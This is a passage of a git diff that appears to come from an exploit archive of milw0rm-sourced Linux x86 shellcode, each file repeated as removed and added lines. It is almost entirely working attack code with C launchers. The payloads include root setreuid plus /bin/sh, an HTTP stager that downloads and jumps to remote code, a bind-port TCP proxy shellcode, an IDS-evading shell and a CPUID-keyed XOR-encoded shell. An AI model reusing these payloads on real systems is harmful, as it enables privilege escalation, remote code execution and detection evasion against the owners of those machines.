%ebx + "\xcd\x80" // int $0x80 + + "\x6a\x2e" // push $0x2e + "\x58" // pop %eax + "\x53" // push %ebx + "\xcd\x80" // int $0x80 + + "\x31\xd2" // xor %edx, %edx + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp, %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp, %ecx + "\xcd\x80"; // int $0x80 + +int main() { + + int (*f)() = (int(*)())shellcode; + printf("Length: %u\n", strlen(shellcode)); + f(); +} + // milw0rm.com [2006-04-03] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13379.c b/platforms/lin_x86/shellcode/13379.c index 8e5701cce..865e27076 100755 --- a/platforms/lin_x86/shellcode/13379.c +++ b/platforms/lin_x86/shellcode/13379.c @@ -1,35 +1,35 @@ -/* - * (Linux/x86) setreuid(0,0) + execve("/bin/sh", ["/bin/sh", NULL]) - * - 33 bytes - * - xgc@gotfault.net - * - */ - -char shellcode[] = - - "\x6a\x46" // push $0x46 - "\x58" // pop %eax - "\x31\xdb" // xor %ebx, %ebx - "\x31\xc9" // xor %ecx, %ecx - "\xcd\x80" // int $0x80 - - "\x31\xd2" // xor %edx, %edx - "\x6a\x0b" // push $0xb - "\x58" // pop %eax - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp, %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp, %ecx - "\xcd\x80"; // int $0x80 - -int main() { - - int (*f)() = (int(*)())shellcode; - printf("Length: %u\n", strlen(shellcode)); - f(); -} - +/* + * (Linux/x86) setreuid(0,0) + execve("/bin/sh", ["/bin/sh", NULL]) + * - 33 bytes + * - xgc@gotfault.net + * + */ + +char shellcode[] = + + "\x6a\x46" // push $0x46 + "\x58" // pop %eax + "\x31\xdb" // xor %ebx, %ebx + "\x31\xc9" // xor %ecx, %ecx + "\xcd\x80" // int $0x80 + + "\x31\xd2" // xor %edx, %edx + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp, %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp, %ecx + "\xcd\x80"; // int $0x80 + +int main() { + + int (*f)() = (int(*)())shellcode; + printf("Length: %u\n", strlen(shellcode)); + f(); +} + // milw0rm.com [2006-04-03] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13380.c b/platforms/lin_x86/shellcode/13380.c index b711b40ff..55ea38dd2 100755 --- a/platforms/lin_x86/shellcode/13380.c +++ b/platforms/lin_x86/shellcode/13380.c @@ -1,141 +1,141 @@ -/* (linux/x86) HTTP/1.x GET, Downloads and JMP - 68 bytes+ - * - * This shellcode allows you to download a binary code straight off a standard HTTP server - * and execute it. The downloaded shellcode (e.g. binary code) will be executed on the stack. - * - * : - * - * > Starting by creating a very simple shellcode, that will be downloaded and execute. - * - * root@magicbox:/tmp# cat foobar.s - * .section .text - * .global _start - * _start: - * - * movl $0x4, %eax - * movl $0x1, %ebx - * - * call _doint - * .ascii "Hello World!" - * .byte 0xa - * _doint: - * popl %ecx - * movl $0xd, %edx - * int $0x80 - * - * movl $0x1, %eax - * int $0x80 - * - * # Reverse CALL - * call _start - * - * > The only requirement from the downloaded shellcode, is that it will include a reverse - * CALL to itself. As this shellcode does not parse the HTTP header, it has no way to know - * where the downloaded shellcode begins or ends. Therefor it realys on the downloaded - * shellcode to supply that, by including a CALL in the bottom, which will be JMP into. - * - * > Compile the given shellcode - * - * root@magicbox:/tmp# as -o foobar.o foobar.s - * root@magicbox:/tmp# ld -o foobar foobar.o - * - * > Convert this file into a raw binary (headerless, formatless) - * - * root@magicbox:/tmp# objcopy -O binary foobar foobar.bin - * - * > Host this file, on some HTTP server (I haved used Apache/1.3.34) - * - * > Use gen_httpreq.c to generate a URL request (e.g. /foobar.bin) - * - * > Paste the gen_httpreq.c output, into this shellcode at the marked place. - * - * > Compile this shellcode w/ the gen_httpreq output in it. - * - * > Execute this shellcode - * - * root@magicbox:/tmp# gcc -o http-download-jmp http-download-jmp.c - * root@magicbox:/tmp# ./http-download-jmp - * Hello World! - * root@magicbox:/tmp# - * - * : - * - * gen_httpreq.c, generates a HTTP GET request for this shellcode - * > http://www.tty64.org/shellcode/utilities/gen_httpreq.c - * - * - izik - */ - -char shellcode[] = - - "\x6a\x66" // push $0x66 - "\x58" // pop %eax - "\x99" // cltd - "\x6a\x01" // push $0x1 - "\x5b" // pop %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x6a\x02" // push $0x2 - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 - "\x5b" // pop %ebx - "\x5d" // pop %ebp - - // - "\xbe\x80\xff\xff\xfe" // mov $0xfeffff80,%esi - // (0x0xfeffff80 = ~127.0.0.1) - // - - // - "\x66\xbd\x91\x1f" // mov $0x1f91,%bp - // (0x1f91 = 8081/tcp) - // - - // - // "\x66\xbd\xaf\xff" // mov $0xffaf, %bp - // // (0xafff = ~0080/tcp) - // "\x66\xf7\xd5" // not %bp - // - - "\xf7\xd6" // not %esi - "\x56" // push %esi - "\x0f\xcd" // bswap %ebp - "\x09\xdd" // or %ebx,%ebp - "\x55" // push %ebp - "\x43" // inc %ebx - "\x6a\x10" // push $0x10 - "\x51" // push %ecx - "\x50" // push %eax - "\xb0\x66" // mov $0x66,%al - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 - - // - // - // - - "\x89\xe1" // mov %esp,%ecx - "\xb0\x04" // mov $0x4,%al - "\xcd\x80" // int $0x80 - - // - // <_recv_http_request>: - // - - "\xb0\x03" // mov $0x3,%al - "\x6a\x01" // push $0x1 - "\x5a" // pop %edx - "\xcd\x80" // int $0x80 - "\x41" // inc %ecx - "\x85\xc0" // test %eax,%eax - "\x75\xf4" // jne <_recv_http_request> - "\x83\xe9\x06" // sub $0x6,%ecx - "\xff\xe1"; // jmp *%ecx - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* (linux/x86) HTTP/1.x GET, Downloads and JMP - 68 bytes+ + * + * This shellcode allows you to download a binary code straight off a standard HTTP server + * and execute it. The downloaded shellcode (e.g. binary code) will be executed on the stack. + * + * : + * + * > Starting by creating a very simple shellcode, that will be downloaded and execute. + * + * root@magicbox:/tmp# cat foobar.s + * .section .text + * .global _start + * _start: + * + * movl $0x4, %eax + * movl $0x1, %ebx + * + * call _doint + * .ascii "Hello World!" + * .byte 0xa + * _doint: + * popl %ecx + * movl $0xd, %edx + * int $0x80 + * + * movl $0x1, %eax + * int $0x80 + * + * # Reverse CALL + * call _start + * + * > The only requirement from the downloaded shellcode, is that it will include a reverse + * CALL to itself. As this shellcode does not parse the HTTP header, it has no way to know + * where the downloaded shellcode begins or ends. Therefor it realys on the downloaded + * shellcode to supply that, by including a CALL in the bottom, which will be JMP into. + * + * > Compile the given shellcode + * + * root@magicbox:/tmp# as -o foobar.o foobar.s + * root@magicbox:/tmp# ld -o foobar foobar.o + * + * > Convert this file into a raw binary (headerless, formatless) + * + * root@magicbox:/tmp# objcopy -O binary foobar foobar.bin + * + * > Host this file, on some HTTP server (I haved used Apache/1.3.34) + * + * > Use gen_httpreq.c to generate a URL request (e.g. /foobar.bin) + * + * > Paste the gen_httpreq.c output, into this shellcode at the marked place. + * + * > Compile this shellcode w/ the gen_httpreq output in it. + * + * > Execute this shellcode + * + * root@magicbox:/tmp# gcc -o http-download-jmp http-download-jmp.c + * root@magicbox:/tmp# ./http-download-jmp + * Hello World! + * root@magicbox:/tmp# + * + * : + * + * gen_httpreq.c, generates a HTTP GET request for this shellcode + * > http://www.tty64.org/shellcode/utilities/gen_httpreq.c + * + * - izik + */ + +char shellcode[] = + + "\x6a\x66" // push $0x66 + "\x58" // pop %eax + "\x99" // cltd + "\x6a\x01" // push $0x1 + "\x5b" // pop %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x6a\x02" // push $0x2 + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 + "\x5b" // pop %ebx + "\x5d" // pop %ebp + + // + "\xbe\x80\xff\xff\xfe" // mov $0xfeffff80,%esi + // (0x0xfeffff80 = ~127.0.0.1) + // + + // + "\x66\xbd\x91\x1f" // mov $0x1f91,%bp + // (0x1f91 = 8081/tcp) + // + + // + // "\x66\xbd\xaf\xff" // mov $0xffaf, %bp + // // (0xafff = ~0080/tcp) + // "\x66\xf7\xd5" // not %bp + // + + "\xf7\xd6" // not %esi + "\x56" // push %esi + "\x0f\xcd" // bswap %ebp + "\x09\xdd" // or %ebx,%ebp + "\x55" // push %ebp + "\x43" // inc %ebx + "\x6a\x10" // push $0x10 + "\x51" // push %ecx + "\x50" // push %eax + "\xb0\x66" // mov $0x66,%al + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 + + // + // + // + + "\x89\xe1" // mov %esp,%ecx + "\xb0\x04" // mov $0x4,%al + "\xcd\x80" // int $0x80 + + // + // <_recv_http_request>: + // + + "\xb0\x03" // mov $0x3,%al + "\x6a\x01" // push $0x1 + "\x5a" // pop %edx + "\xcd\x80" // int $0x80 + "\x41" // inc %ecx + "\x85\xc0" // test %eax,%eax + "\x75\xf4" // jne <_recv_http_request> + "\x83\xe9\x06" // sub $0x6,%ecx + "\xff\xe1"; // jmp *%ecx + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-03-12] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13381.c b/platforms/lin_x86/shellcode/13381.c index 7cd258fca..5b97bdb49 100755 --- a/platforms/lin_x86/shellcode/13381.c +++ b/platforms/lin_x86/shellcode/13381.c @@ -1,225 +1,225 @@ -// proxylib.c - is located at http://www.milw0rm.com/id.php?id=1476 /str0ke - -/******************************************************************** - - hey all.. this is my attempt at a very small very functional tcp - proxy shellcode.. to pull this off i ignored the "socks" protocols - and invented my own.. sorta.. - - how to use me.. - - deliver shellcode however you would normally deliver shellcode to a - machine, lets say 192.168.1.1 in this case.. - - on your machine you would setup the proxy library like so: - - phar@hatless-cat ~/proxyshell $ gcc -c -o proxyshell_connect.o proxylib.c -fpic - phar@hatless-cat ~/proxyshell $ ld -shared -o proxyshell_connect.so proxyshell_connect.o -ldl - phar@hatless-cat ~/proxyshell $ export LD_PRELOAD=/full/path/to/proxyshell_connect.so - phar@hatless-cat ~/proxyshell $ export SHELLPROXYHOST=192.168.1.16:1280 - - - from now on any calls to connect() will be proxied through the shellcode - which can handle multiple simultanious connections to arbitrary hosts. - - by default the shell binds to port 1280, you can easily modify which - the host binds to by finding the code labeled "port info" like this - - "\xba\xfd\xff\xfa\xff" // mov $0xfffafffd,%edx ;port info - - invert the last for bytes (logical NOT) and you'll see where port - 0x5000 is declared.. adjust to whatever port you want, and reinvert.. - - - proxylib.c should be available at stonedcoder.org - - one last note about proxylib.c, it does not handle dns resolution properly, - so ip addresses only.. unless you know.. you feel like making it work.. - - - - phar[at]stonedcoder[dot]org - http://www.stonedcoder.org - http://bpp.etherdyne.net -********************************************************************/ - - - -char shellcode[] = { -//main: - "\x31\xc0" // xor %eax,%eax - "\x89\xc3" // mov %eax,%ebx - "\x50" // push %eax - "\x40" // inc %eax - "\x50" // push %eax - "\x40" // inc %eax - "\x50" // push %eax - "\x89\xe1" // mov %esp,%ecx - "\xb0\x66" // mov $0x66,%al - "\x89\xc7" // mov %eax,%edi - "\x43" // inc %ebx - "\xcd\x80" // int $0x80 ;socket - - "\x89\xc6" // mov %eax,%esi - "\x89\xf8" // mov %edi,%eax - "\x31\xd2" // xor %edx,%edx - "\x52" // push %edx - "\x52" // push %edx - "\x52" // push %edx - "\xba\xfd\xff\xfa\xff" // mov $0xfffafffd,%edx ;port info - "\xf7\xd2" // not %edx - "\x52" // push %edx - "\x89\xe1" // mov %esp,%ecx - "\x31\xd2" // xor %edx,%edx - "\xb2\x10" // mov $0x10,%dl - "\x52" // push %edx - "\x51" // push %ecx - "\x56" // push %esi - "\x89\xe1" // mov %esp,%ecx - "\x43" // inc %ebx - "\xcd\x80" // int $0x80 ;bind - - "\x53" // push %ebx - "\x56" // push %esi - "\x89\xe1" // mov %esp,%ecx - "\xb0\x66" // mov $0x66,%al - "\xb3\x04" // mov $0x4,%bl - "\xcd\x80" // int $0x80 ;listen - - "\x31\xc9" // xor %ecx,%ecx - "\x41" // inc %ecx - "\xb3\x11" // mov $0x11,%bl - "\xb0\x30" // mov $0x30,%al - "\xcd\x80" // int $0x80 ;signal - -//do_next_accept: - "\x31\xc0" // xor %eax,%eax - "\x50" // push %eax - "\x50" // push %eax - "\x56" // push %esi - "\x89\xe1" // mov %esp,%ecx - "\xb0\x66" // mov $0x66,%al - "\x89\xc2" // mov %eax,%edx - "\xb3\x05" // mov $0x5,%bl - "\xcd\x80" // int $0x80 ;accept - - "\x89\xc7" // mov %eax,%edi - "\x31\xc0" // xor %eax,%eax - "\x50" // push %eax - "\x40" // inc %eax - "\x50" // push %eax - "\x40" // inc %eax - "\x50" // push %eax - "\xcd\x80" // int $0x80 ;fork - - "\x85\xc0" // test %eax,%eax - "\x75\xe2" // jne 8048398 - "\x89\xe1" // mov %esp,%ecx - "\xb0\x66" // mov $0x66,%al - "\x89\xc3" // mov %eax,%ebx - "\xb3\x01" // mov $0x1,%bl - "\xcd\x80" // int $0x80 ;socket - - "\x89\xc6" // mov %eax,%esi - "\xb0\x10" // mov $0x10,%al - "\x29\xc4" // sub %eax,%esp - "\x89\xe1" // mov %esp,%ecx - "\x31\xc0" // xor %eax,%eax - "\x50" // push %eax - "\x52" // push %edx - "\x51" // push %ecx - "\x57" // push %edi - "\x89\xe1" // mov %esp,%ecx - "\xb0\x66" // mov $0x66,%al - "\xb3\x0a" // mov $0xa,%bl - "\xcd\x80" // int $0x80 ;recv - - - "\xb0\x66" // mov $0x66,%al - "\xb3\x03" // mov $0x3,%bl - "\x89\x34\x24" // mov %esi,(%esp) - "\xcd\x80" // int $0x80 - "\x85\xc0" // test %eax,%eax - "\x74\x14" // jz ready_to_proxy - -//close: - "\x89\xf3" // mov %esi,%ebx - "\x31\xc0" // xor %eax,%eax - "\xb0\x06" // mov $0x6,%al - "\xcd\x80" // int $0x80 ;close - - "\x87\xf7" // xchg %esi,%edi - "\x85\xc0" // test %eax,%eax - "\x74\xf" // jz close - -//exit: - "\x31\xc0" // xor %eax,%eax - "\xb0\x01" // mov $0x1,%al - "\xcd\x80" // int $0x80 ;recv - -//ready_to_proxy: - "\x31\xdb" // xor %ebx,%ebx - "\xb3\x10" // mov $0x10,%bl - "\x01\xdc" // add %ebx,%esp - "\x87\xf7" // xchg %esi,%edi - "\x31\xc0" // xor %eax,%eax - "\x50" // push %eax - "\x56" // push %esi - "\x89\xe3" // mov %esp,%ebx - "\x31\xc9" // xor %ecx,%ecx - "\x41" // inc %ecx - "\x89\xca" // mov %ecx,%edx - "\xb0\xa8" // mov $0xa8,%al - "\xcd\x80" // int $0x80 ;connect - - "\x31\xc0" // xor %eax,%eax - "\xb0\x40" // mov $0x40,%al - "\x89\xe2" // mov %esp,%edx - "\x50" // push %eax - "\xb0\x08" // mov $0x8,%al - "\x50" // push %eax - "\x52" // push %edx - "\x56" // push %esi - "\x89\xe1" // mov %esp,%ecx - "\x31\xdb" // xor %ebx,%ebx - "\xb3\x0a" // mov $0xa,%bl - -//do_next_proxy:, - "\x31\xc0" // xor %eax,%eax - "\xb0\x66" // mov $0x66,%al - "\xcd\x80" // int $0x80 ;send/recv - "\x85\xc0" // test %eax,%eax - "\x74\xb9" // jz close - "\x89\xda" // mov %ebx,%edx - "\xf6\xc2\x01" // test $0x1,%dl - "\x75\xc6" // jnz ready_to_proxy - -//is_recv_call: - "\x89\xc2" // mov %eax,%edx - "\xd1\xe2" // shl %edx - "\x72\xc0" // jb ready_to_proxy - "\x89\x41\x08" // mov %eax,0x8(%ecx) - "\x89\x39" // mov %edi,(%ecx) - "\x4b" // dec %ebx - "\xeb\xe1" // jmp do_next_proxy -}; - - -int main() { -int *ret; -char cnull = 0; - - printf("shellcode_size: %u\n", sizeof(shellcode)); - printf("contains nulls: "); - if(!memmem(shellcode,sizeof(shellcode),&cnull,1)){ - printf("yes\n"); - }else{ - printf("no\n"); - } - - ret = (int *)&ret + 2; - (*ret) = (int)shellcode; - -} - +// proxylib.c - is located at http://www.milw0rm.com/id.php?id=1476 /str0ke + +/******************************************************************** + + hey all.. this is my attempt at a very small very functional tcp + proxy shellcode.. to pull this off i ignored the "socks" protocols + and invented my own.. sorta.. + + how to use me.. + + deliver shellcode however you would normally deliver shellcode to a + machine, lets say 192.168.1.1 in this case.. + + on your machine you would setup the proxy library like so: + + phar@hatless-cat ~/proxyshell $ gcc -c -o proxyshell_connect.o proxylib.c -fpic + phar@hatless-cat ~/proxyshell $ ld -shared -o proxyshell_connect.so proxyshell_connect.o -ldl + phar@hatless-cat ~/proxyshell $ export LD_PRELOAD=/full/path/to/proxyshell_connect.so + phar@hatless-cat ~/proxyshell $ export SHELLPROXYHOST=192.168.1.16:1280 + + + from now on any calls to connect() will be proxied through the shellcode + which can handle multiple simultanious connections to arbitrary hosts. + + by default the shell binds to port 1280, you can easily modify which + the host binds to by finding the code labeled "port info" like this + + "\xba\xfd\xff\xfa\xff" // mov $0xfffafffd,%edx ;port info + + invert the last for bytes (logical NOT) and you'll see where port + 0x5000 is declared.. adjust to whatever port you want, and reinvert.. + + + proxylib.c should be available at stonedcoder.org + + one last note about proxylib.c, it does not handle dns resolution properly, + so ip addresses only.. unless you know.. you feel like making it work.. + + + + phar[at]stonedcoder[dot]org + http://www.stonedcoder.org + http://bpp.etherdyne.net +********************************************************************/ + + + +char shellcode[] = { +//main: + "\x31\xc0" // xor %eax,%eax + "\x89\xc3" // mov %eax,%ebx + "\x50" // push %eax + "\x40" // inc %eax + "\x50" // push %eax + "\x40" // inc %eax + "\x50" // push %eax + "\x89\xe1" // mov %esp,%ecx + "\xb0\x66" // mov $0x66,%al + "\x89\xc7" // mov %eax,%edi + "\x43" // inc %ebx + "\xcd\x80" // int $0x80 ;socket + + "\x89\xc6" // mov %eax,%esi + "\x89\xf8" // mov %edi,%eax + "\x31\xd2" // xor %edx,%edx + "\x52" // push %edx + "\x52" // push %edx + "\x52" // push %edx + "\xba\xfd\xff\xfa\xff" // mov $0xfffafffd,%edx ;port info + "\xf7\xd2" // not %edx + "\x52" // push %edx + "\x89\xe1" // mov %esp,%ecx + "\x31\xd2" // xor %edx,%edx + "\xb2\x10" // mov $0x10,%dl + "\x52" // push %edx + "\x51" // push %ecx + "\x56" // push %esi + "\x89\xe1" // mov %esp,%ecx + "\x43" // inc %ebx + "\xcd\x80" // int $0x80 ;bind + + "\x53" // push %ebx + "\x56" // push %esi + "\x89\xe1" // mov %esp,%ecx + "\xb0\x66" // mov $0x66,%al + "\xb3\x04" // mov $0x4,%bl + "\xcd\x80" // int $0x80 ;listen + + "\x31\xc9" // xor %ecx,%ecx + "\x41" // inc %ecx + "\xb3\x11" // mov $0x11,%bl + "\xb0\x30" // mov $0x30,%al + "\xcd\x80" // int $0x80 ;signal + +//do_next_accept: + "\x31\xc0" // xor %eax,%eax + "\x50" // push %eax + "\x50" // push %eax + "\x56" // push %esi + "\x89\xe1" // mov %esp,%ecx + "\xb0\x66" // mov $0x66,%al + "\x89\xc2" // mov %eax,%edx + "\xb3\x05" // mov $0x5,%bl + "\xcd\x80" // int $0x80 ;accept + + "\x89\xc7" // mov %eax,%edi + "\x31\xc0" // xor %eax,%eax + "\x50" // push %eax + "\x40" // inc %eax + "\x50" // push %eax + "\x40" // inc %eax + "\x50" // push %eax + "\xcd\x80" // int $0x80 ;fork + + "\x85\xc0" // test %eax,%eax + "\x75\xe2" // jne 8048398 + "\x89\xe1" // mov %esp,%ecx + "\xb0\x66" // mov $0x66,%al + "\x89\xc3" // mov %eax,%ebx + "\xb3\x01" // mov $0x1,%bl + "\xcd\x80" // int $0x80 ;socket + + "\x89\xc6" // mov %eax,%esi + "\xb0\x10" // mov $0x10,%al + "\x29\xc4" // sub %eax,%esp + "\x89\xe1" // mov %esp,%ecx + "\x31\xc0" // xor %eax,%eax + "\x50" // push %eax + "\x52" // push %edx + "\x51" // push %ecx + "\x57" // push %edi + "\x89\xe1" // mov %esp,%ecx + "\xb0\x66" // mov $0x66,%al + "\xb3\x0a" // mov $0xa,%bl + "\xcd\x80" // int $0x80 ;recv + + + "\xb0\x66" // mov $0x66,%al + "\xb3\x03" // mov $0x3,%bl + "\x89\x34\x24" // mov %esi,(%esp) + "\xcd\x80" // int $0x80 + "\x85\xc0" // test %eax,%eax + "\x74\x14" // jz ready_to_proxy + +//close: + "\x89\xf3" // mov %esi,%ebx + "\x31\xc0" // xor %eax,%eax + "\xb0\x06" // mov $0x6,%al + "\xcd\x80" // int $0x80 ;close + + "\x87\xf7" // xchg %esi,%edi + "\x85\xc0" // test %eax,%eax + "\x74\xf" // jz close + +//exit: + "\x31\xc0" // xor %eax,%eax + "\xb0\x01" // mov $0x1,%al + "\xcd\x80" // int $0x80 ;recv + +//ready_to_proxy: + "\x31\xdb" // xor %ebx,%ebx + "\xb3\x10" // mov $0x10,%bl + "\x01\xdc" // add %ebx,%esp + "\x87\xf7" // xchg %esi,%edi + "\x31\xc0" // xor %eax,%eax + "\x50" // push %eax + "\x56" // push %esi + "\x89\xe3" // mov %esp,%ebx + "\x31\xc9" // xor %ecx,%ecx + "\x41" // inc %ecx + "\x89\xca" // mov %ecx,%edx + "\xb0\xa8" // mov $0xa8,%al + "\xcd\x80" // int $0x80 ;connect + + "\x31\xc0" // xor %eax,%eax + "\xb0\x40" // mov $0x40,%al + "\x89\xe2" // mov %esp,%edx + "\x50" // push %eax + "\xb0\x08" // mov $0x8,%al + "\x50" // push %eax + "\x52" // push %edx + "\x56" // push %esi + "\x89\xe1" // mov %esp,%ecx + "\x31\xdb" // xor %ebx,%ebx + "\xb3\x0a" // mov $0xa,%bl + +//do_next_proxy:, + "\x31\xc0" // xor %eax,%eax + "\xb0\x66" // mov $0x66,%al + "\xcd\x80" // int $0x80 ;send/recv + "\x85\xc0" // test %eax,%eax + "\x74\xb9" // jz close + "\x89\xda" // mov %ebx,%edx + "\xf6\xc2\x01" // test $0x1,%dl + "\x75\xc6" // jnz ready_to_proxy + +//is_recv_call: + "\x89\xc2" // mov %eax,%edx + "\xd1\xe2" // shl %edx + "\x72\xc0" // jb ready_to_proxy + "\x89\x41\x08" // mov %eax,0x8(%ecx) + "\x89\x39" // mov %edi,(%ecx) + "\x4b" // dec %ebx + "\xeb\xe1" // jmp do_next_proxy +}; + + +int main() { +int *ret; +char cnull = 0; + + printf("shellcode_size: %u\n", sizeof(shellcode)); + printf("contains nulls: "); + if(!memmem(shellcode,sizeof(shellcode),&cnull,1)){ + printf("yes\n"); + }else{ + printf("no\n"); + } + + ret = (int *)&ret + 2; + (*ret) = (int)shellcode; + +} + // milw0rm.com [2006-02-07] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13382.c b/platforms/lin_x86/shellcode/13382.c index 8654278e1..52f2becd6 100755 --- a/platforms/lin_x86/shellcode/13382.c +++ b/platforms/lin_x86/shellcode/13382.c @@ -1,78 +1,78 @@ -/* -[N] Shell : shellcodez - -Arch:x86 -Platform:linux -Size:40 -Description: -The shellcode to execute /bin/sh; -This shellcode is anti-ids -It not containz encoding engine but it -not contain standart signatures as: - "\xcd\x80" - '\bin\sh' -Tested on Slackware 10.0 - -Coded by [NicatiN] -http://nshell.h15.ru -n_shell@mail.ru - - -source: -cdq -push edx -pop eax -push edx -mov edi,876189623 -add edi,edi -push edi -mov edi,884021143 -add edi,edi -inc edi -push edi -mov ebx,esp -push edx -push ebx -mov ecx,esp -mov al,99 -sub al,88 -sub edi,1768009314 -push edi -call esp - -dizasm: -8048080: 99 cltd -8048081: 52 push %edx -8048082: 58 pop %eax -8048083: 52 push %edx -8048084: bf b7 97 39 34 mov $0x343997b7,%edi -8048089: 01 ff add %edi,%edi -804808b: 57 push %edi -804808c: bf 97 17 b1 34 mov $0x34b11797,%edi -8048091: 01 ff add %edi,%edi -8048093: 47 inc %edi -8048094: 57 push %edi -8048095: 89 e3 mov %esp,%ebx -8048097: 52 push %edx -8048098: 53 push %ebx -8048099: 89 e1 mov %esp,%ecx -804809b: b0 63 mov $0x63,%al -804809d: 2c 58 sub $0x58,%al -804809f: 81 ef 62 ae 61 69 sub $0x6961ae62,%edi -80480a5: 57 push %edi -80480a6: ff d4 call *%esp - -*/ - -char sc[]= -"\x99\x52\x58\x52\xbf\xb7\x97\x39\x34\x01\xff\x57\xbf\x97\x17\xb1" -"\x34\x01\xff\x47\x57\x89\xe3\x52\x53\x89\xe1\xb0\x63\x2c\x58\x81" -"\xef\x62\xae\x61\x69\x57\xff\xd4"; - -int main() -{ - int (*f)() = (int (*)())sc; - f(); -} - +/* +[N] Shell : shellcodez + +Arch:x86 +Platform:linux +Size:40 +Description: +The shellcode to execute /bin/sh; +This shellcode is anti-ids +It not containz encoding engine but it +not contain standart signatures as: + "\xcd\x80" + '\bin\sh' +Tested on Slackware 10.0 + +Coded by [NicatiN] +http://nshell.h15.ru +n_shell@mail.ru + + +source: +cdq +push edx +pop eax +push edx +mov edi,876189623 +add edi,edi +push edi +mov edi,884021143 +add edi,edi +inc edi +push edi +mov ebx,esp +push edx +push ebx +mov ecx,esp +mov al,99 +sub al,88 +sub edi,1768009314 +push edi +call esp + +dizasm: +8048080: 99 cltd +8048081: 52 push %edx +8048082: 58 pop %eax +8048083: 52 push %edx +8048084: bf b7 97 39 34 mov $0x343997b7,%edi +8048089: 01 ff add %edi,%edi +804808b: 57 push %edi +804808c: bf 97 17 b1 34 mov $0x34b11797,%edi +8048091: 01 ff add %edi,%edi +8048093: 47 inc %edi +8048094: 57 push %edi +8048095: 89 e3 mov %esp,%ebx +8048097: 52 push %edx +8048098: 53 push %ebx +8048099: 89 e1 mov %esp,%ecx +804809b: b0 63 mov $0x63,%al +804809d: 2c 58 sub $0x58,%al +804809f: 81 ef 62 ae 61 69 sub $0x6961ae62,%edi +80480a5: 57 push %edi +80480a6: ff d4 call *%esp + +*/ + +char sc[]= +"\x99\x52\x58\x52\xbf\xb7\x97\x39\x34\x01\xff\x57\xbf\x97\x17\xb1" +"\x34\x01\xff\x47\x57\x89\xe3\x52\x53\x89\xe1\xb0\x63\x2c\x58\x81" +"\xef\x62\xae\x61\x69\x57\xff\xd4"; + +int main() +{ + int (*f)() = (int (*)())sc; + f(); +} + // milw0rm.com [2006-01-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13383.c b/platforms/lin_x86/shellcode/13383.c index 0febc7054..5e563bb53 100755 --- a/platforms/lin_x86/shellcode/13383.c +++ b/platforms/lin_x86/shellcode/13383.c @@ -1,42 +1,42 @@ -/* - * (linux/x86) execve("/bin/sh", ["/bin/sh"], NULL) / xor'ed against Intel x86 CPUID - 41 bytes - * - * The idea behind this shellcode is to use a *weak* pre-shared secret between the attacker and - * the attacked machine. So if a 3rd party side would try to run this shellcode and would produce - * a different CPUID output (e.g. different arch) the shellcode won't work. In addition this also - * prevents from having the '/bin/sh' string visible on the wire. - * - * The shellcode key is (0x6c65746e, 'letn') and expected to be in %ecx register after CPUID - * - * - izik - */ - -char shellcode[] = - - "\x31\xc0" // xor %eax,%eax - "\x0f\xa2" // cpuid - "\x51" // push %ecx - "\x68\xe7\x95\xa8\xec" // push $0xeca895e7 - "\x68\xde\x7f\x37\x3f" // push $0x3f377fde - "\x68\x07\x1a\xec\x8f" // push $0x8fec1a07 - "\x68\x6e\x1c\x4a\x0e" // push $0x0e4a1c6e - "\x68\x06\x5b\x16\x04" // push $0x04165b06 - - // - // <_unpack_loop>: - // - - "\x31\x0c\x24" // xor %ecx,(%esp) - "\x5a" // pop %edx - "\x75\xfa" // jne <_unpack_loop> - "\x83\xec\x18" // sub $0x18,%esp - "\x54" // push %esp - "\xc3"; // ret - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) execve("/bin/sh", ["/bin/sh"], NULL) / xor'ed against Intel x86 CPUID - 41 bytes + * + * The idea behind this shellcode is to use a *weak* pre-shared secret between the attacker and + * the attacked machine. So if a 3rd party side would try to run this shellcode and would produce + * a different CPUID output (e.g. different arch) the shellcode won't work. In addition this also + * prevents from having the '/bin/sh' string visible on the wire. + * + * The shellcode key is (0x6c65746e, 'letn') and expected to be in %ecx register after CPUID + * + * - izik + */ + +char shellcode[] = + + "\x31\xc0" // xor %eax,%eax + "\x0f\xa2" // cpuid + "\x51" // push %ecx + "\x68\xe7\x95\xa8\xec" // push $0xeca895e7 + "\x68\xde\x7f\x37\x3f" // push $0x3f377fde + "\x68\x07\x1a\xec\x8f" // push $0x8fec1a07 + "\x68\x6e\x1c\x4a\x0e" // push $0x0e4a1c6e + "\x68\x06\x5b\x16\x04" // push $0x04165b06 + + // + // <_unpack_loop>: + // + + "\x31\x0c\x24" // xor %ecx,(%esp) + "\x5a" // pop %edx + "\x75\xfa" // jne <_unpack_loop> + "\x83\xec\x18" // sub $0x18,%esp + "\x54" // push %esp + "\xc3"; // ret + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) 